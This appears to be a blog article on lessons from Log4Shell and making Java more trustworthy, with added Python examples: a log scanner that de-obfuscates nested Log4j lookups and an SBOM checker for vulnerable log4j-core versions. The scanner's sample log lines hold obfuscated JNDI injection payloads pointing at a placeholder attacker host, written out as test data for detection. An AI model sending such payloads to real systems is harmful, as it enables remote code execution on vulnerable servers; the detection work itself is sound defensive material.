Log4Shell Shows The Need for “Trustworthy Java”

What Just Happened?

  1. How did we handle Log4Shell?
  2. How can we prevent another Log4Shell?

How Did We Handle Log4Shell?

  1. Establish a team to handle the crisis, with a single person in charge.
  2. Set up centralized channels of communication — going in and going out.
  3. Analyze the situation and get the message out about the fixes.
  4. Take in new information, adjust your fixes, adjust your message, and get the updated message out.
  5. Rinse & repeat.

How Can We Prevent Another Log4Shell?

Remote JNDI Code Execution

  • In 2015, Oracle fixed CVE-2015-4902 in Java 6, 7, and 8. This Black Hat cybersecurity presentation from 2016 showed that this vulnerability was used to attack NATO and the White House. It also discussed how to bypass Oracle’s fix.
  • This article from January 2019 details how Oracle later fixed remote JNDI code execution twice, in Java 8u121 and Java 8u191, and why attacks were still possible afterward. I think disabling remote JNDI code execution by default in Java 8u121 is the reason why we initially thought that some Java versions were immune to Log4Shell.
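
The lookup strings that trigger remote JNDI code execution in Log4Shell rarely reach the log verbatim: attackers nest and obfuscate them with Log4j's own lookup syntax, so a plain search for `${jndi:` misses most of them. The Python script below is an added example (not code from this article or from the Log4j project). It collapses nested lookups the way Log4j's StrSubstitutor does for the parts that can be evaluated offline (`lower:` and `upper:` transforms, and the `:-` default of any lookup that cannot be resolved, such as `env:` or an empty name), then flags any `${jndi:...}` that surfaces and reports its URL scheme. The log lines are constructed samples and `attacker.example` is a placeholder host.

```python
"""Collapse Log4j 2 lookup nesting in log data and flag JNDI lookups.

Added example with constructed log lines; not code from the article.
"""
import re

# An innermost ${...}: its body contains no further '${' and no '}'.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and its URL scheme (ldap, ldaps, rmi, dns, ...), matched
# case-insensitively because Log4j lower-cases the lookup prefix.
_JNDI = re.compile(r"\$\{jndi:([a-z]*)", re.IGNORECASE)


def _resolve_one(body):
    """Resolve the body of one innermost ${...} as far as is possible offline.

    Mirrors the parts of Log4j's StrSubstitutor/Interpolator behaviour that do
    not depend on the target host: 'lower:' and 'upper:' transform their
    argument; ':-' introduces a default that is used when the lookup fails.
    Returns the replacement text, or None to leave the lookup in place.
    """
    key, has_default, default = body.partition(":-")
    prefix, has_prefix, value = key.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        # Never rewrite: Log4j performs the JNDI lookup before any default.
        return None
    if has_prefix and prefix == "lower":
        return value.lower()
    if has_prefix and prefix == "upper":
        return value.upper()
    # env:, sys:, date:, bare names and the empty lookup "${::-x}" cannot be
    # evaluated here; assume they fail, so Log4j would use the default.
    return default if has_default else None


def normalize(text, max_rounds=32):
    """Repeatedly collapse innermost lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def replace(match):
            nonlocal changed
            resolved = _resolve_one(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = _INNERMOST.sub(replace, text)
        if not changed:
            break
    return text


def find_jndi(line):
    """Return the URL schemes of JNDI lookups in the line after normalisation
    ('?' if the scheme itself is still obfuscated); empty list if none."""
    return [scheme.lower() or "?" for scheme in _JNDI.findall(normalize(line))]


# Constructed access-log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.7 "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.8 "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:RMI}://attacker.example/a}"',
    '10.0.0.10 "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.example/a}"',
    '10.0.0.11 "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi${env:NOPE:-:}${env:NOPE:-d}ns://attacker.example/a}"',
    '10.0.0.12 "GET /?q=${date:yyyy} HTTP/1.1" 200 "-"',
]


def scan(lines):
    """Return (index, schemes, normalised line) for every suspicious line."""
    hits = []
    for index, line in enumerate(lines):
        schemes = find_jndi(line)
        if schemes:
            hits.append((index, schemes, normalize(line)))
    return hits


if __name__ == "__main__":
    for index, schemes, normalised in scan(SAMPLE_LOG):
        print(f"line {index}: jndi over {','.join(schemes)} -> {normalised}")
```

The resolver deliberately leaves `jndi:` lookups untouched, including any `:-` default, because Log4j attempts the JNDI lookup before it falls back to the default. Lookups that depend on the target's environment (`env:`, `sys:`, `date:`) are assumed to fail, which is exactly what an attacker who supplies a default counts on; the same lookups without a default stay in place unresolved, so a payload whose letters come only from the victim's own environment variables is reported with scheme `?` or not at all.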

Deserialization Attacks

Java Security Manager

Trustworthy Java?

Trustworthy Java!

  • We Java developers probably know most direct dependencies of our Java applications. But we generally don’t know the dependencies of our dependencies. A “Software bill of materials” (SBOM) solves that issue: it is a machine-readable list of all components of an application, transitive dependencies included. That’s why an SBOM can tell us quickly whether our applications contain a vulnerable Log4j version. Under US Executive Order 14028 (May 2021), vendors who want to sell software to the US federal government will need to provide such an SBOM. The ripple effects of that decision could push SBOMs into the mainstream and change how we build our Java applications.
  • How quickly can we patch our Java applications? Well, who says that we need to do this manually? Java applications increasingly run in virtual machines and containers. Imagine how much time and money we could have saved during Log4Shell if VMware, Docker & Kubernetes had automatically updated Log4j! Sounds far-fetched? Red Hat’s OpenShift apparently already does this for “blessed Java container images”.
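
Checking an SBOM for a vulnerable log4j-core, as an added example (Python, not code from this article): the script walks a constructed CycloneDX JSON document, including nested components and entries that carry only a purl, and compares every `org.apache.logging.log4j:log4j-core` version it finds against the minimum recommended by the Apache Log4j security advisories for its release line (2.17.1 for Java 8+, 2.12.4 for Java 7, 2.3.2 for Java 6). The SBOM content and the `com.acme:acme-reporting` component are made up.

```python
"""Check a CycloneDX JSON SBOM for log4j-core versions that need upgrading.

Added example with a constructed SBOM; not code from the article.
"""
import json

# Minimum log4j-core version per release line, as recommended by the Apache
# Log4j security advisories for Log4Shell and its follow-up CVEs
# (Java 8+: 2.17.1, Java 7: 2.12.4, Java 6: 2.3.2).
FIXED = {"2.3": "2.3.2", "2.12": "2.12.4", "2": "2.17.1"}

# Constructed CycloneDX 1.4 document, trimmed to the fields the scan uses.
# "acme-reporting" is a made-up internal library that bundles log4j-core.
SAMPLE_SBOM = json.loads("""
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {"type": "library", "group": "com.acme", "name": "acme-reporting", "version": "3.2.0",
     "components": [
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core",
        "version": "2.14.1", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"}
     ]},
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.17.1"},
    {"type": "library", "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.12.2?type=jar"},
    {"type": "library", "group": "log4j", "name": "log4j", "version": "1.2.17"}
  ]
}
""")


def walk(components):
    """Yield every component, descending into nested 'components' lists."""
    for component in components:
        yield component
        yield from walk(component.get("components", []))


def identify(component):
    """Return (group, name, version), taken from the Maven purl when present
    and from the group/name/version fields otherwise."""
    purl = component.get("purl", "")
    if purl.startswith("pkg:maven/"):
        coordinates, _, version = purl[len("pkg:maven/"):].partition("@")
        group, _, name = coordinates.partition("/")
        return group, name, version.split("?")[0]   # drop purl qualifiers
    return component.get("group"), component.get("name"), component.get("version")


def parse_version(version):
    """Turn '2.0-beta9' or '2.14.1' into a comparable tuple. A pre-release tag
    sorts before the final release of the same number, and non-numeric
    segments such as a vendor suffix end the numeric part."""
    core, _, pre = version.partition("-")
    numbers = []
    for part in core.split("."):
        if not part.isdigit():
            break
        numbers.append(int(part))
    numbers += [0] * (3 - len(numbers))
    return (*numbers[:3], 0 if pre else 1, pre)


def assess(version):
    """Return (fixed_version, needs_upgrade) for a log4j-core 2.x version, or
    (None, None) for anything outside the 2.x line."""
    parsed = parse_version(version)
    if parsed[0] != 2:
        return None, None
    line = {(2, 3): "2.3", (2, 12): "2.12"}.get(parsed[:2], "2")
    fixed = FIXED[line]
    return fixed, parsed < parse_version(fixed)


def scan(sbom):
    """Return (version, fixed_version, needs_upgrade) for each log4j-core found."""
    findings = []
    for component in walk(sbom.get("components", [])):
        group, name, version = identify(component)
        if (group, name) == ("org.apache.logging.log4j", "log4j-core") and version:
            fixed, needs_upgrade = assess(version)
            findings.append((version, fixed, needs_upgrade))
    return findings


if __name__ == "__main__":
    for version, fixed, needs_upgrade in scan(SAMPLE_SBOM):
        status = f"UPGRADE to {fixed}" if needs_upgrade else "ok"
        print(f"log4j-core {version}: {status}")
```

An SBOM is only as good as its generator: a log4j-core shaded into an uber-jar, or copied into a container image outside the build, only shows up if the generator unpacks archives. Pair the SBOM check with a scan of the deployed artifacts themselves, for example for a `JndiLookup.class` inside any jar.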

Karsten Silz is a full-stack web & mobile developer with 22 years of Java experience, author, speaker, and entrepreneur.